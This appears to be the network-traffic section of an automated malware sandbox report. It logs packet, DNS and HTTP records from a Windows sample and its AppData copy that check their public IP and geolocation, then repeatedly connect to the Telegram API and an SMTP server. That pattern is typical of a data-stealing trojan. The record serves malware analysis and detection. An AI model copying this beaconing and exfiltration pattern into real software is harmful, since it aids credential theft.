Oct 7, 2024 22:43:36.924386978 CEST	52192	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:36.930473089 CEST	52193	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:36.930536985 CEST	443	52193	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:36.930876970 CEST	52193	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:36.931265116 CEST	52193	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:36.931278944 CEST	443	52193	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:37.575835943 CEST	443	52193	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:37.579103947 CEST	52193	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:37.579132080 CEST	443	52193	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:37.581595898 CEST	52193	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:37.581617117 CEST	443	52193	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:37.943666935 CEST	443	52193	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:37.943865061 CEST	443	52193	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:37.944021940 CEST	52193	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:37.944514990 CEST	52193	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:37.946353912 CEST	52194	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:37.951289892 CEST	465	52194	172.65.255.143	192.168.2.8
Oct 7, 2024 22:43:37.951374054 CEST	52194	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:43.185535908 CEST	52194	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:43.185983896 CEST	52195	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:43.186021090 CEST	443	52195	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:43.186153889 CEST	52195	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:43.186914921 CEST	52195	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:43.186929941 CEST	443	52195	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:43.191008091 CEST	465	52194	172.65.255.143	192.168.2.8
Oct 7, 2024 22:43:43.193619013 CEST	52194	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:43.783996105 CEST	443	52195	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:43.786693096 CEST	52195	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:43.786731005 CEST	443	52195	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:43.786784887 CEST	52195	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:43.786796093 CEST	443	52195	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:44.090615988 CEST	443	52195	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:44.090790987 CEST	443	52195	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:44.090837955 CEST	52195	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:44.091561079 CEST	52195	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:44.093230963 CEST	52196	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:44.098103046 CEST	465	52196	172.65.255.143	192.168.2.8
Oct 7, 2024 22:43:44.098171949 CEST	52196	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:48.120376110 CEST	52196	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:48.123271942 CEST	52197	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:48.123380899 CEST	443	52197	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:48.123466015 CEST	52197	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:48.123754978 CEST	52197	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:48.123790979 CEST	443	52197	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:48.125678062 CEST	465	52196	172.65.255.143	192.168.2.8
Oct 7, 2024 22:43:48.125725031 CEST	52196	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:48.722676039 CEST	443	52197	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:48.724836111 CEST	52197	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:48.724916935 CEST	443	52197	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:48.724984884 CEST	52197	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:48.724999905 CEST	443	52197	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:49.036942005 CEST	443	52197	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:49.037112951 CEST	443	52197	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:49.037206888 CEST	52197	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:49.037728071 CEST	52197	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:49.038949013 CEST	52198	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:49.043816090 CEST	465	52198	172.65.255.143	192.168.2.8
Oct 7, 2024 22:43:49.043929100 CEST	52198	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:52.604772091 CEST	52198	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:52.607860088 CEST	52199	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:52.607893944 CEST	443	52199	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:52.607990980 CEST	52199	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:52.608238935 CEST	52199	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:52.608253002 CEST	443	52199	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:52.610557079 CEST	465	52198	172.65.255.143	192.168.2.8
Oct 7, 2024 22:43:52.610670090 CEST	52198	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:53.232666016 CEST	443	52199	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:53.234447956 CEST	52199	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:53.234467983 CEST	443	52199	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:53.234534025 CEST	52199	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:53.234544039 CEST	443	52199	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:53.528378010 CEST	443	52199	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:53.530505896 CEST	443	52199	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:53.530622959 CEST	52199	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:53.531008005 CEST	52199	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:53.532681942 CEST	52200	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:53.538403988 CEST	465	52200	172.65.255.143	192.168.2.8
Oct 7, 2024 22:43:53.538527012 CEST	52200	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:44:14.479785919 CEST	52200	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:44:14.483690023 CEST	52201	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:44:14.483735085 CEST	443	52201	149.154.167.220	192.168.2.8
Oct 7, 2024 22:44:14.483800888 CEST	52201	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:44:14.484186888 CEST	52201	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:44:14.484200954 CEST	443	52201	149.154.167.220	192.168.2.8
Oct 7, 2024 22:44:14.485747099 CEST	465	52200	172.65.255.143	192.168.2.8
Oct 7, 2024 22:44:14.485817909 CEST	52200	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:44:15.083569050 CEST	443	52201	149.154.167.220	192.168.2.8
Oct 7, 2024 22:44:15.085808039 CEST	52201	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:44:15.085850954 CEST	443	52201	149.154.167.220	192.168.2.8
Oct 7, 2024 22:44:15.085963011 CEST	52201	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:44:15.085972071 CEST	443	52201	149.154.167.220	192.168.2.8
Oct 7, 2024 22:44:15.929786921 CEST	443	52201	149.154.167.220	192.168.2.8
Oct 7, 2024 22:44:15.929876089 CEST	443	52201	149.154.167.220	192.168.2.8
Oct 7, 2024 22:44:15.929943085 CEST	52201	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:44:15.930491924 CEST	52201	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:44:15.932034969 CEST	52202	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:44:15.937884092 CEST	465	52202	172.65.255.143	192.168.2.8
Oct 7, 2024 22:44:15.937961102 CEST	52202	465	192.168.2.8	172.65.255.143

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 22:41:06.449513912 CEST	63864	53	192.168.2.8	1.1.1.1
Oct 7, 2024 22:41:06.457592010 CEST	53	63864	1.1.1.1	192.168.2.8
Oct 7, 2024 22:41:07.632766008 CEST	57644	53	192.168.2.8	1.1.1.1
Oct 7, 2024 22:41:07.640436888 CEST	53	57644	1.1.1.1	192.168.2.8
Oct 7, 2024 22:41:23.033795118 CEST	57355	53	192.168.2.8	1.1.1.1
Oct 7, 2024 22:41:23.041681051 CEST	53	57355	1.1.1.1	192.168.2.8
Oct 7, 2024 22:41:29.355204105 CEST	51085	53	192.168.2.8	1.1.1.1
Oct 7, 2024 22:41:29.384244919 CEST	53	51085	1.1.1.1	192.168.2.8
Oct 7, 2024 22:41:37.205128908 CEST	53	56614	162.159.36.2	192.168.2.8
Oct 7, 2024 22:41:37.689034939 CEST	50742	53	192.168.2.8	1.1.1.1
Oct 7, 2024 22:41:37.698477030 CEST	53	50742	1.1.1.1	192.168.2.8
Oct 7, 2024 22:42:37.675730944 CEST	53524	53	192.168.2.8	1.1.1.1
Oct 7, 2024 22:42:37.682864904 CEST	53	53524	1.1.1.1	192.168.2.8
Oct 7, 2024 22:42:40.109541893 CEST	53602	53	192.168.2.8	1.1.1.1
Oct 7, 2024 22:42:40.117265940 CEST	53	53602	1.1.1.1	192.168.2.8
Oct 7, 2024 22:43:04.109261036 CEST	51710	53	192.168.2.8	1.1.1.1
Oct 7, 2024 22:43:04.116974115 CEST	53	51710	1.1.1.1	192.168.2.8
Oct 7, 2024 22:43:36.922846079 CEST	63609	53	192.168.2.8	1.1.1.1
Oct 7, 2024 22:43:36.929725885 CEST	53	63609	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2024 22:41:06.449513912 CEST	192.168.2.8	1.1.1.1	0x8e14	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:41:07.632766008 CEST	192.168.2.8	1.1.1.1	0xdacd	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:41:23.033795118 CEST	192.168.2.8	1.1.1.1	0x11d9	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:41:29.355204105 CEST	192.168.2.8	1.1.1.1	0x202a	Standard query (0)	smtp.hostinger.com	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:41:37.689034939 CEST	192.168.2.8	1.1.1.1	0x8e89	Standard query (0)	15.164.165.52.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Oct 7, 2024 22:42:37.675730944 CEST	192.168.2.8	1.1.1.1	0x64e3	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:42:40.109541893 CEST	192.168.2.8	1.1.1.1	0x231d	Standard query (0)	smtp.hostinger.com	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:43:04.109261036 CEST	192.168.2.8	1.1.1.1	0x10f6	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:43:36.922846079 CEST	192.168.2.8	1.1.1.1	0xc30e	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 22:41:06.457592010 CEST	1.1.1.1	192.168.2.8	0x8e14	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 22:41:06.457592010 CEST	1.1.1.1	192.168.2.8	0x8e14	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:41:06.457592010 CEST	1.1.1.1	192.168.2.8	0x8e14	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:41:06.457592010 CEST	1.1.1.1	192.168.2.8	0x8e14	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:41:06.457592010 CEST	1.1.1.1	192.168.2.8	0x8e14	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:41:06.457592010 CEST	1.1.1.1	192.168.2.8	0x8e14	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:41:07.640436888 CEST	1.1.1.1	192.168.2.8	0xdacd	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:41:07.640436888 CEST	1.1.1.1	192.168.2.8	0xdacd	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:41:23.041681051 CEST	1.1.1.1	192.168.2.8	0x11d9	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:41:29.384244919 CEST	1.1.1.1	192.168.2.8	0x202a	No error (0)	smtp.hostinger.com		172.65.255.143	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:41:37.698477030 CEST	1.1.1.1	192.168.2.8	0x8e89	Name error (3)	15.164.165.52.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Oct 7, 2024 22:42:37.682864904 CEST	1.1.1.1	192.168.2.8	0x64e3	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:42:40.117265940 CEST	1.1.1.1	192.168.2.8	0x231d	No error (0)	smtp.hostinger.com		172.65.255.143	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:43:04.116974115 CEST	1.1.1.1	192.168.2.8	0x10f6	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 7, 2024 22:43:36.929725885 CEST	1.1.1.1	192.168.2.8	0xc30e	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49707	132.226.8.169	80	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:06.476396084 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 22:41:07.285541058 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:07 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 22:41:07.289518118 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 22:41:07.590934992 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:07 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 22:41:09.051461935 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 22:41:09.335439920 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:09 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49712	132.226.8.169	80	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:09.559895039 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 22:41:10.419563055 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 22:41:10.429023027 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 22:41:10.816339016 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 22:41:11.467271090 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 22:41:11.752085924 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49713	132.226.8.169	80	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:10.003928900 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 22:41:10.827805996 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49717	132.226.8.169	80	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:11.445122004 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 22:41:13.202253103 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 22:41:13.213942051 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 22:41:13.213993073 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 22:41:13.214097977 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49720	132.226.8.169	80	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:13.359287977 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 22:41:14.138420105 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49721	132.226.8.169	80	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:14.017002106 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 22:41:14.857388020 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49723	132.226.8.169	80	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:41:14.799417019 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
